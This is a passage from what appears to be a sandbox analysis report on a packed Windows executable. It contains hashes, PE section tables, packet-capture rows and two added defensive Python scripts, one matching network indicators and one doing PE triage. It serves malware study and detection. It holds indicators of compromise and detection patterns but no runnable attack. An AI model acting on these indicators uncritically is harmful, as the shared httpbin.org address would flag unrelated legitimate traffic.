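The context tables above are the report's own data, but turning them into detections needs one caveat the tables themselves make visible: 34.226.108.155 is the address behind httpbin.org on AMAZON-AES, so dozens of unrelated samples (and plenty of legitimate software) reach it; matching or blocking on that IP alone produces noise. The following script is an added example written for this page, not Joe Sandbox code: it matches constructed DNS and connection log lines against the indicators from the tables, counts the shared IP only when the same host resolved httpbin.org to it shortly before, and treats 5.101.3.217 (the plaintext-HTTP peer in the packet table below) as dedicated infrastructure. The "dedicated" label, the log format, and the 300-second window are assumptions for the example, not findings the report states.

```python
from collections import defaultdict
from dataclasses import dataclass

# Indicators lifted from the report's context tables. 34.226.108.155 is marked
# shared because the same tables show it as the address behind httpbin.org on
# AMAZON-AES, reached by many unrelated samples. Treating 5.101.3.217 as
# dedicated is an assumption for this example, not a verdict from the report.
IOCS = {
    "httpbin.org":    {"shared": True,  "via": None},
    "34.226.108.155": {"shared": True,  "via": "httpbin.org"},
    "5.101.3.217":    {"shared": False, "via": None},
}


@dataclass
class Hit:
    ts: float
    host: str
    indicator: str
    severity: str
    reason: str


def parse_dns(line: str):
    """Constructed format: '<ts> <client> <query> <answer>'."""
    ts, host, query, answer = line.split()
    return float(ts), host, query, answer


def parse_conn(line: str):
    """Constructed format: '<ts> <client> <server> <dport>'."""
    ts, host, dst, dport = line.split()
    return float(ts), host, dst, int(dport)


def match(dns_lines, conn_lines, window=300.0):
    """Return hits. A connection to a shared IP counts only when the same host
    resolved the indicator domain to that IP within `window` seconds."""
    resolved = defaultdict(list)          # (host, answer_ip) -> [(ts, query)]
    hits = []
    for line in dns_lines:
        ts, host, query, answer = parse_dns(line)
        resolved[(host, answer)].append((ts, query))
        if query in IOCS:
            hits.append(Hit(ts, host, query, "low",
                            "lookup of shared-service domain; pivot only, do not block"))
    for line in conn_lines:
        ts, host, dst, dport = parse_conn(line)
        ioc = IOCS.get(dst)
        if ioc is None:
            continue
        if not ioc["shared"]:
            hits.append(Hit(ts, host, dst, "high",
                            "connection to dedicated indicator on port %d" % dport))
            continue
        recent = [q for t, q in resolved.get((host, dst), []) if 0 <= ts - t <= window]
        if ioc["via"] in recent:
            hits.append(Hit(ts, host, dst, "low",
                            "shared IP reached via %s; corroborating signal only" % ioc["via"]))
        # No DNS tie to the indicator domain: another tenant on the same cloud IP; ignore.
    return hits


# Constructed log lines (not taken from the report's PCAP): host .4 behaves like
# the sample, host .9 merely talks to the same cloud address.
DNS_LOG = [
    "1000.0 192.168.2.4 httpbin.org 34.226.108.155",
]
CONN_LOG = [
    "1000.5 192.168.2.4 34.226.108.155 443",
    "1005.0 192.168.2.4 5.101.3.217 80",
    "1100.0 192.168.2.9 34.226.108.155 443",
    "1101.0 192.168.2.9 203.0.113.10 443",
]


def run_sample():
    return match(DNS_LOG, CONN_LOG)


if __name__ == "__main__":
    for h in run_sample():
        print("%-5s %s -> %s  (%s)" % (h.severity, h.host, h.indicator, h.reason))
```

Host 192.168.2.9 produces no hit even though it reached 34.226.108.155: without a resolution of httpbin.org the connection is indistinguishable from traffic to any other tenant on that address.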
                                                File type:PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows
                                                Entropy (8bit):7.984706666086648
                                                TrID:
                                                • Win32 Executable (generic) a (10002005/4) 99.96%
                                                • Generic Win/DOS Executable (2004/3) 0.02%
                                                • DOS Executable Generic (2002/1) 0.02%
                                                • VXD Driver (31/22) 0.00%
                                                • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                File name:HrIrtCXI3s.exe
                                                File size:4'476'416 bytes
                                                MD5:629763eb39d91bb69848475c90ad1e63
                                                SHA1:dc7b1a7b530dc7c8a22e50836ad747483b06bf3e
                                                SHA256:b493e279c1d18ac53caeca4e865c658c25f256fda1be8a5d9ef33184e67497e0
                                                SHA512:ae32f35381b81bf9242f8ecf0932ecc35ab32d8f113e196f95bf1828bfc8c5ec82214e9c2967af2ca660779921fd2001dc68faf86a52b771d2006d773478ef80
                                                SSDEEP:98304:Iz59801nKEwOdv/4QHqYX/osqMZX2E7EHgk:Oe01nKKHNosdZmIEf
                                                TLSH:C5263302A63A6C78CD9715B09D95E24DB1E00D365DBCAA2159237A3FAF0B1CC5ED0ECD
                                                File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L..._.lg...............(..I...p..2........... I...@...................................D...@... ............................
                                                Icon Hash:90cececece8e8eb0
                                                Entrypoint:0x102a000
                                                Entrypoint Section:.taggant
                                                Digitally signed:true
                                                Imagebase:0x400000
                                                Subsystem:windows gui
                                                Image File Characteristics:EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DEBUG_STRIPPED
                                                DLL Characteristics:DYNAMIC_BASE
                                                Time Stamp:0x676CDB5F [Thu Dec 26 04:28:15 2024 UTC]
                                                TLS Callbacks:
                                                CLR (.Net) Version:
                                                OS Version Major:4
                                                OS Version Minor:0
                                                File Version Major:4
                                                File Version Minor:0
                                                Subsystem Version Major:4
                                                Subsystem Version Minor:0
                                                Import Hash:2eabe9054cad5152567f0699947a2c5b
                                                Signature Valid:
                                                Signature Issuer:
                                                Signature Validation Error:
                                                Error Number:
                                                Not Before, Not After
                                                  Subject Chain
                                                    Version:
                                                    Thumbprint MD5:
                                                    Thumbprint SHA-1:
                                                    Thumbprint SHA-256:
                                                    Serial:
                                                    Instruction
                                                    jmp 00007FFBBCCCF52Ah
                                                    cvttps2pi mm0, qword ptr [eax+eax+00h]
                                                    add byte ptr [eax], al
                                                    add cl, ch
                                                    add byte ptr [eax], ah
                                                    add byte ptr [eax], al
                                                    add byte ptr [0000000Ah], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], dh
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax+eax], bl
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add eax, 0000000Ah
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [edi], al
                                                    add byte ptr [eax], 00000000h
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    adc byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add eax, 0000000Ah
                                                    add byte ptr [eax], al
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x6dd05f | 0x73 | .idata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x6dc000 | 0x1ac | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x708a00 | 0x688 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0xc284d4 | 0x10 | lqffkoae
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0xc28484 | 0x18 | lqffkoae
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
(no name) | 0x1000 | 0x6db000 | 0x288a00 | 4b6018460450da1554a684b0520db3c8 | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc | 0x6dc000 | 0x1ac | 0x200 | 5044a17d360931486605268a85250ce8 | False | 0.587890625 | data | 4.535874912317744 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.idata | 0x6dd000 | 0x1000 | 0x200 | 6363462e4ea156e03144265f6be7871e | False | 0.166015625 | data | 1.1763897754724144 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
(no name) | 0x6de000 | 0x392000 | 0x200 | 8bc8719af353418cd94257d0fd31ce17 | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
lqffkoae | 0xa70000 | 0x1b9000 | 0x1b8800 | 2c4d3f2df722a97a37c98a37170e7dd1 | False | 0.9943955732122588 | OpenPGP Public Key | 7.954980284330732 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
wsxqcczr | 0xc29000 | 0x1000 | 0x400 | 7776ce62886fdc17a633e1f6ed7957ab | False | 0.81640625 | data | 6.224627654125138 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.taggant | 0xc2a000 | 0x3000 | 0x2200 | ee69a878f222f121f024d511f6cf4cb0 | False | 0.05744485294117647 | DOS executable (COM) | 0.7884741957272196 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_MANIFEST | 0xc284e4 | 0x152 | ASCII text, with CRLF line terminators | | | 0.6479289940828402
DLL | Import
kernel32.dll | lstrcpy
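The static tables above carry the evidence behind several of the report's signatures: every executable section is also writable, two sections have no name and two have random eight-letter names, the entry point sits in .taggant rather than .text, lqffkoae has an entropy of 7.95, and the only import is kernel32!lstrcpy. One further check is worth doing by hand: the IMAGE_DIRECTORY_ENTRY_SECURITY directory points at file offset 0x708a00 (7'375'360), which is past the end of a 4'476'416-byte file, so "Digitally signed: true" only reflects a non-zero directory entry and the empty Signature fields are the expected result. The script below is an added example written for this page, not Joe Sandbox code. It builds a small PE32 image in memory whose section names, RVAs, characteristics, entry point and SECURITY directory are copied from the tables (section contents are filler: zeros for the low-entropy sections, seeded pseudo-random bytes standing in for the packed ones), then runs the checks a reviewer would apply to the real file. Section sizes and contents are constructed, and the set of "standard" section names is an assumption for the example.

```python
import math
import random
import struct

# Section characteristic bits (winnt.h values)
IMAGE_SCN_CNT_INITIALIZED_DATA = 0x00000040
IMAGE_SCN_MEM_EXECUTE = 0x20000000
IMAGE_SCN_MEM_READ = 0x40000000
IMAGE_SCN_MEM_WRITE = 0x80000000
WRITE_EXEC = IMAGE_SCN_MEM_EXECUTE | IMAGE_SCN_MEM_WRITE
# Names a normal linker emits (assumed list); anything else, including an empty name, is worth a look.
STANDARD_NAMES = {".text", ".rdata", ".data", ".rsrc", ".reloc", ".idata", ".edata",
                  ".pdata", ".bss", ".tls", ".CRT", "CODE", "DATA", "BSS"}
ENTRY_NAMES = {".text", "CODE"}


def shannon_entropy(data: bytes) -> float:
    """Bits per byte: 0.0 for empty or constant data, close to 8.0 for compressed or encrypted data."""
    if not data:
        return 0.0
    n, counts = len(data), [0] * 256
    for b in data:
        counts[b] += 1
    return -sum(c / n * math.log2(c / n) for c in counts if c)


def build_sample_pe(sections, entry_rva, security_dir) -> bytes:
    """Assemble a minimal PE32 image in memory (constructed test input, not a real binary)."""
    e_lfanew, hdr_size, opt_size = 0x80, 0x400, 0xE0
    dos = bytearray(e_lfanew)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, e_lfanew)
    coff = struct.pack("<HHIIIHH", 0x14C, len(sections), 0x676CDB5F, 0, 0, opt_size, 0x0102)
    opt = bytearray(opt_size)
    struct.pack_into("<H", opt, 0, 0x10B)                    # PE32 magic
    struct.pack_into("<I", opt, 16, entry_rva)               # AddressOfEntryPoint
    struct.pack_into("<I", opt, 28, 0x400000)                # ImageBase
    struct.pack_into("<I", opt, 92, 16)                      # NumberOfRvaAndSizes
    struct.pack_into("<II", opt, 96 + 4 * 8, *security_dir)  # directory 4 = SECURITY
    headers, body, ptr = bytearray(), bytearray(), hdr_size
    for name, vaddr, vsize, raw, chars in sections:
        headers += struct.pack("<8sIIIIIIHHI", name.encode().ljust(8, b"\0"),
                               vsize, vaddr, len(raw), ptr, 0, 0, 0, 0, chars)
        body += raw
        ptr += len(raw)
    image = bytes(dos) + b"PE\0\0" + coff + bytes(opt) + bytes(headers)
    return image.ljust(hdr_size, b"\0") + bytes(body)


def parse_pe(blob: bytes) -> dict:
    """Read the headers a triage pass needs; PE32 only, which matches the 32-bit sample."""
    e_lfanew = struct.unpack_from("<I", blob, 0x3C)[0]
    if blob[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    coff = e_lfanew + 4
    nsec = struct.unpack_from("<H", blob, coff + 2)[0]
    opt_size = struct.unpack_from("<H", blob, coff + 16)[0]
    opt = coff + 20
    if struct.unpack_from("<H", blob, opt)[0] != 0x10B:
        raise ValueError("only PE32 is handled here")
    entry_rva = struct.unpack_from("<I", blob, opt + 16)[0]
    sec_off, sec_size = struct.unpack_from("<II", blob, opt + 96 + 4 * 8)  # SECURITY holds a file offset, not an RVA
    sections, pos = [], opt + opt_size
    for _ in range(nsec):
        name, vsize, vaddr, rawsize, rawptr, _, _, _, _, chars = struct.unpack_from("<8sIIIIIIHHI", blob, pos)
        sections.append({"name": name.rstrip(b"\0").decode("ascii", "replace"), "vaddr": vaddr,
                         "vsize": vsize, "chars": chars, "data": blob[rawptr:rawptr + rawsize]})
        pos += 40
    return {"entry_rva": entry_rva, "security": (sec_off, sec_size), "sections": sections, "file_size": len(blob)}


def triage(pe: dict) -> list:
    """Flag the layout properties the report's static signatures are built on."""
    findings, ep = [], pe["entry_rva"]
    ep_sec = next((s for s in pe["sections"]
                   if s["vaddr"] <= ep < s["vaddr"] + max(s["vsize"], len(s["data"]))), None)
    if ep_sec is None:
        findings.append("entry point 0x%x is outside every section" % ep)
    elif ep_sec["name"] not in ENTRY_NAMES:
        findings.append("entry point 0x%x lies in section %r" % (ep, ep_sec["name"]))
    for s in pe["sections"]:
        if s["chars"] & WRITE_EXEC == WRITE_EXEC:
            findings.append("section %r is writable and executable" % s["name"])
        if s["name"] not in STANDARD_NAMES:
            findings.append("non-standard section name %r" % s["name"])
        ent = shannon_entropy(s["data"])
        if s["chars"] & IMAGE_SCN_MEM_EXECUTE and ent > 7.0:
            findings.append("executable section %r has entropy %.2f (packed or encrypted)" % (s["name"], ent))
    off, size = pe["security"]
    if size and off + size > pe["file_size"]:
        findings.append("security directory 0x%x+0x%x ends past EOF 0x%x: signature cannot be parsed"
                        % (off, size, pe["file_size"]))
    return findings


def sample_from_report() -> bytes:
    """Layout copied from the report's section table; raw contents are constructed filler."""
    rnd = random.Random(1)
    packed = bytes(rnd.getrandbits(8) for _ in range(4096))  # stands in for packed code
    zeros = bytes(4096)
    rwx = IMAGE_SCN_CNT_INITIALIZED_DATA | IMAGE_SCN_MEM_EXECUTE | IMAGE_SCN_MEM_READ | IMAGE_SCN_MEM_WRITE
    rw = IMAGE_SCN_CNT_INITIALIZED_DATA | IMAGE_SCN_MEM_READ | IMAGE_SCN_MEM_WRITE
    layout = [
        ("",         0x1000,   0x6db000, zeros,          rwx),
        (".rsrc",    0x6dc000, 0x1ac,    zeros[:0x200],  rw),
        (".idata",   0x6dd000, 0x1000,   zeros[:0x200],  rw),
        ("",         0x6de000, 0x392000, zeros[:0x200],  rwx),
        ("lqffkoae", 0xa70000, 0x1b9000, packed,         rwx),
        ("wsxqcczr", 0xc29000, 0x1000,   packed[:0x400], rwx),
        (".taggant", 0xc2a000, 0x3000,   zeros[:0x2200], rwx),
    ]
    # Entry point RVA and SECURITY directory (0x708a00, 0x688) as listed in the report.
    return build_sample_pe(layout, 0xc2a000, (0x708a00, 0x688))


if __name__ == "__main__":
    for line in triage(parse_pe(sample_from_report())):
        print(line)
```

Run against the real file, `parse_pe(open(path, "rb").read())` reports the same shape of findings; the entropy values will then match the table rather than the filler used here, and the out-of-range SECURITY offset will reproduce because that number comes straight from the headers.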
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Dec 26, 2024 14:14:17.034759045 CET | 49730 | 443 | 192.168.2.4 | 34.226.108.155
Dec 26, 2024 14:14:17.034816027 CET | 443 | 49730 | 34.226.108.155 | 192.168.2.4
Dec 26, 2024 14:14:17.034900904 CET | 49730 | 443 | 192.168.2.4 | 34.226.108.155
Dec 26, 2024 14:14:17.046051025 CET | 49730 | 443 | 192.168.2.4 | 34.226.108.155
Dec 26, 2024 14:14:17.046067953 CET | 443 | 49730 | 34.226.108.155 | 192.168.2.4
Dec 26, 2024 14:14:18.919981956 CET | 443 | 49730 | 34.226.108.155 | 192.168.2.4
Dec 26, 2024 14:14:18.920665026 CET | 49730 | 443 | 192.168.2.4 | 34.226.108.155
Dec 26, 2024 14:14:18.920696974 CET | 443 | 49730 | 34.226.108.155 | 192.168.2.4
Dec 26, 2024 14:14:18.922158003 CET | 443 | 49730 | 34.226.108.155 | 192.168.2.4
Dec 26, 2024 14:14:18.922247887 CET | 49730 | 443 | 192.168.2.4 | 34.226.108.155
Dec 26, 2024 14:14:18.923731089 CET | 49730 | 443 | 192.168.2.4 | 34.226.108.155
Dec 26, 2024 14:14:18.923806906 CET | 443 | 49730 | 34.226.108.155 | 192.168.2.4
Dec 26, 2024 14:14:18.936403990 CET | 49730 | 443 | 192.168.2.4 | 34.226.108.155
Dec 26, 2024 14:14:18.936424017 CET | 443 | 49730 | 34.226.108.155 | 192.168.2.4
Dec 26, 2024 14:14:18.979897022 CET | 49730 | 443 | 192.168.2.4 | 34.226.108.155
Dec 26, 2024 14:14:19.274878979 CET | 443 | 49730 | 34.226.108.155 | 192.168.2.4
Dec 26, 2024 14:14:19.275032997 CET | 443 | 49730 | 34.226.108.155 | 192.168.2.4
Dec 26, 2024 14:14:19.275180101 CET | 49730 | 443 | 192.168.2.4 | 34.226.108.155
Dec 26, 2024 14:14:19.283993959 CET | 49730 | 443 | 192.168.2.4 | 34.226.108.155
Dec 26, 2024 14:14:19.284013033 CET | 443 | 49730 | 34.226.108.155 | 192.168.2.4
Dec 26, 2024 14:14:22.211525917 CET | 49731 | 80 | 192.168.2.4 | 5.101.3.217
Dec 26, 2024 14:14:22.331146002 CET | 80 | 49731 | 5.101.3.217 | 192.168.2.4
Dec 26, 2024 14:14:22.331253052 CET | 49731 | 80 | 192.168.2.4 | 5.101.3.217
Dec 26, 2024 14:14:22.332536936 CET | 49731 | 80 | 192.168.2.4 | 5.101.3.217
Dec 26, 2024 14:14:22.452111959 CET | 80 | 49731 | 5.101.3.217 | 192.168.2.4
Dec 26, 2024 14:14:22.452142000 CET | 80 | 49731 | 5.101.3.217 | 192.168.2.4
Dec 26, 2024 14:14:22.452162981 CET | 80 | 49731 | 5.101.3.217 | 192.168.2.4
Dec 26, 2024 14:14:22.452194929 CET | 80 | 49731 | 5.101.3.217 | 192.168.2.4
Dec 26, 2024 14:14:22.452215910 CET | 80 | 49731 | 5.101.3.217 | 192.168.2.4
Dec 26, 2024 14:14:22.452215910 CET | 49731 | 80 | 192.168.2.4 | 5.101.3.217
Dec 26, 2024 14:14:22.452249050 CET | 49731 | 80 | 192.168.2.4 | 5.101.3.217
Dec 26, 2024 14:14:22.452265024 CET | 49731 | 80 | 192.168.2.4 | 5.101.3.217
Dec 26, 2024 14:14:22.452265978 CET | 80 | 49731 | 5.101.3.217 | 192.168.2.4
Dec 26, 2024 14:14:22.452306986 CET | 49731 | 80 | 192.168.2.4 | 5.101.3.217
Dec 26, 2024 14:14:22.452394009 CET | 80 | 49731 | 5.101.3.217 | 192.168.2.4
Dec 26, 2024 14:14:22.452406883 CET | 80 | 49731 | 5.101.3.217 | 192.168.2.4
Dec 26, 2024 14:14:22.452449083 CET | 49731 | 80 | 192.168.2.4 | 5.101.3.217
Dec 26, 2024 14:14:22.452457905 CET | 80 | 49731 | 5.101.3.217 | 192.168.2.4
Dec 26, 2024 14:14:22.452503920 CET | 49731 | 80 | 192.168.2.4 | 5.101.3.217
Dec 26, 2024 14:14:22.452529907 CET | 80 | 49731 | 5.101.3.217 | 192.168.2.4
Dec 26, 2024 14:14:22.452585936 CET | 49731 | 80 | 192.168.2.4 | 5.101.3.217
Dec 26, 2024 14:14:22.571942091 CET | 80 | 49731 | 5.101.3.217 | 192.168.2.4
Dec 26, 2024 14:14:22.571984053 CET | 80 | 49731 | 5.101.3.217 | 192.168.2.4
Dec 26, 2024 14:14:22.572017908 CET | 49731 | 80 | 192.168.2.4 | 5.101.3.217
Dec 26, 2024 14:14:22.572036982 CET | 80 | 49731 | 5.101.3.217 | 192.168.2.4
Dec 26, 2024 14:14:22.572046041 CET | 80 | 49731 | 5.101.3.217 | 192.168.2.4
Dec 26, 2024 14:14:22.572069883 CET | 49731 | 80 | 192.168.2.4 | 5.101.3.217
Dec 26, 2024 14:14:22.572089911 CET | 49731 | 80 | 192.168.2.4 | 5.101.3.217
Dec 26, 2024 14:14:22.572127104 CET | 80 | 49731 | 5.101.3.217 | 192.168.2.4
Dec 26, 2024 14:14:22.572135925 CET | 80 | 49731 | 5.101.3.217 | 192.168.2.4
Dec 26, 2024 14:14:22.572179079 CET | 49731 | 80 | 192.168.2.4 | 5.101.3.217
Dec 26, 2024 14:14:22.572204113 CET | 49731 | 80 | 192.168.2.4 | 5.101.3.217
Dec 26, 2024 14:14:22.619992018 CET | 80 | 49731 | 5.101.3.217 | 192.168.2.4
Dec 26, 2024 14:14:22.620080948 CET | 49731 | 80 | 192.168.2.4 | 5.101.3.217
Dec 26, 2024 14:14:22.731929064 CET | 80 | 49731 | 5.101.3.217 | 192.168.2.4
Dec 26, 2024 14:14:22.732009888 CET | 49731 | 80 | 192.168.2.4 | 5.101.3.217
Dec 26, 2024 14:14:22.779892921 CET | 80 | 49731 | 5.101.3.217 | 192.168.2.4
Dec 26, 2024 14:14:22.891959906 CET | 80 | 49731 | 5.101.3.217 | 192.168.2.4
Dec 26, 2024 14:14:22.892132044 CET | 49731 | 80 | 192.168.2.4 | 5.101.3.217
Dec 26, 2024 14:14:23.093106985 CET | 80 | 49731 | 5.101.3.217 | 192.168.2.4
Dec 26, 2024 14:14:23.093158007 CET | 49731 | 80 | 192.168.2.4 | 5.101.3.217
Dec 26, 2024 14:14:23.335863113 CET | 80 | 49731 | 5.101.3.217 | 192.168.2.4
Dec 26, 2024 14:14:23.336009026 CET | 49731 | 80 | 192.168.2.4 | 5.101.3.217
Dec 26, 2024 14:14:23.416296005 CET | 80 | 49731 | 5.101.3.217 | 192.168.2.4
Dec 26, 2024 14:14:23.416455030 CET | 49731 | 80 | 192.168.2.4 | 5.101.3.217
Dec 26, 2024 14:14:23.416529894 CET | 49731 | 80 | 192.168.2.4 | 5.101.3.217
Dec 26, 2024 14:14:23.455487013 CET | 80 | 49731 | 5.101.3.217 | 192.168.2.4
Dec 26, 2024 14:14:23.455553055 CET | 49731 | 80 | 192.168.2.4 | 5.101.3.217
Dec 26, 2024 14:14:23.536138058 CET | 80 | 49731 | 5.101.3.217 | 192.168.2.4
Dec 26, 2024 14:14:23.536149979 CET | 80 | 49731 | 5.101.3.217 | 192.168.2.4
Dec 26, 2024 14:14:23.536159039 CET | 80 | 49731 | 5.101.3.217 | 192.168.2.4
Dec 26, 2024 14:14:23.536189079 CET | 80 | 49731 | 5.101.3.217 | 192.168.2.4
Dec 26, 2024 14:14:23.536199093 CET | 80 | 49731 | 5.101.3.217 | 192.168.2.4
Dec 26, 2024 14:14:23.536214113 CET | 49731 | 80 | 192.168.2.4 | 5.101.3.217
Dec 26, 2024 14:14:23.536246061 CET | 49731 | 80 | 192.168.2.4 | 5.101.3.217
Dec 26, 2024 14:14:23.536257029 CET | 49731 | 80 | 192.168.2.4 | 5.101.3.217
Dec 26, 2024 14:14:23.536267996 CET | 80 | 49731 | 5.101.3.217 | 192.168.2.4
Dec 26, 2024 14:14:23.536303043 CET | 80 | 49731 | 5.101.3.217 | 192.168.2.4
Dec 26, 2024 14:14:23.536312103 CET | 49731 | 80 | 192.168.2.4 | 5.101.3.217
Dec 26, 2024 14:14:23.536349058 CET | 49731 | 80 | 192.168.2.4 | 5.101.3.217
Dec 26, 2024 14:14:23.536369085 CET | 80 | 49731 | 5.101.3.217 | 192.168.2.4
Dec 26, 2024 14:14:23.536379099 CET | 80 | 49731 | 5.101.3.217 | 192.168.2.4
Dec 26, 2024 14:14:23.536408901 CET | 49731 | 80 | 192.168.2.4 | 5.101.3.217
Dec 26, 2024 14:14:23.536420107 CET | 49731 | 80 | 192.168.2.4 | 5.101.3.217
Dec 26, 2024 14:14:23.536468983 CET | 80 | 49731 | 5.101.3.217 | 192.168.2.4
Dec 26, 2024 14:14:23.536478043 CET | 80 | 49731 | 5.101.3.217 | 192.168.2.4
Dec 26, 2024 14:14:23.536525011 CET | 49731 | 80 | 192.168.2.4 | 5.101.3.217
Dec 26, 2024 14:14:23.536534071 CET | 80 | 49731 | 5.101.3.217 | 192.168.2.4
Dec 26, 2024 14:14:23.536580086 CET | 49731 | 80 | 192.168.2.4 | 5.101.3.217
Dec 26, 2024 14:14:23.536650896 CET | 80 | 49731 | 5.101.3.217 | 192.168.2.4
Dec 26, 2024 14:14:23.536699057 CET | 49731 | 80 | 192.168.2.4 | 5.101.3.217
Dec 26, 2024 14:14:23.536731005 CET | 80 | 49731 | 5.101.3.217 | 192.168.2.4
Dec 26, 2024 14:14:23.536772966 CET | 49731 | 80 | 192.168.2.4 | 5.101.3.217
Dec 26, 2024 14:14:23.536906958 CET | 80 | 49731 | 5.101.3.217 | 192.168.2.4
Dec 26, 2024 14:14:23.537056923 CET | 80 | 49731 | 5.101.3.217 | 192.168.2.4
Dec 26, 2024 14:14:23.537139893 CET | 80 | 49731 | 5.101.3.217 | 192.168.2.4
Dec 26, 2024 14:14:23.537178040 CET | 80 | 49731 | 5.101.3.217 | 192.168.2.4
Dec 26, 2024 14:14:23.537271023 CET | 80 | 49731 | 5.101.3.217 | 192.168.2.4
Dec 26, 2024 14:14:23.537300110 CET | 80 | 49731 | 5.101.3.217 | 192.168.2.4
Dec 26, 2024 14:14:23.537481070 CET | 80 | 49731 | 5.101.3.217 | 192.168.2.4
Dec 26, 2024 14:14:23.537512064 CET | 80 | 49731 | 5.101.3.217 | 192.168.2.4
Dec 26, 2024 14:14:23.537560940 CET | 80 | 49731 | 5.101.3.217 | 192.168.2.4
Dec 26, 2024 14:14:23.537595987 CET | 80 | 49731 | 5.101.3.217 | 192.168.2.4
Dec 26, 2024 14:14:23.537739992 CET | 80 | 49731 | 5.101.3.217 | 192.168.2.4
Dec 26, 2024 14:14:23.537801981 CET | 80 | 49731 | 5.101.3.217 | 192.168.2.4
Dec 26, 2024 14:14:23.537870884 CET | 80 | 49731 | 5.101.3.217 | 192.168.2.4
Dec 26, 2024 14:14:23.537965059 CET | 80 | 49731 | 5.101.3.217 | 192.168.2.4
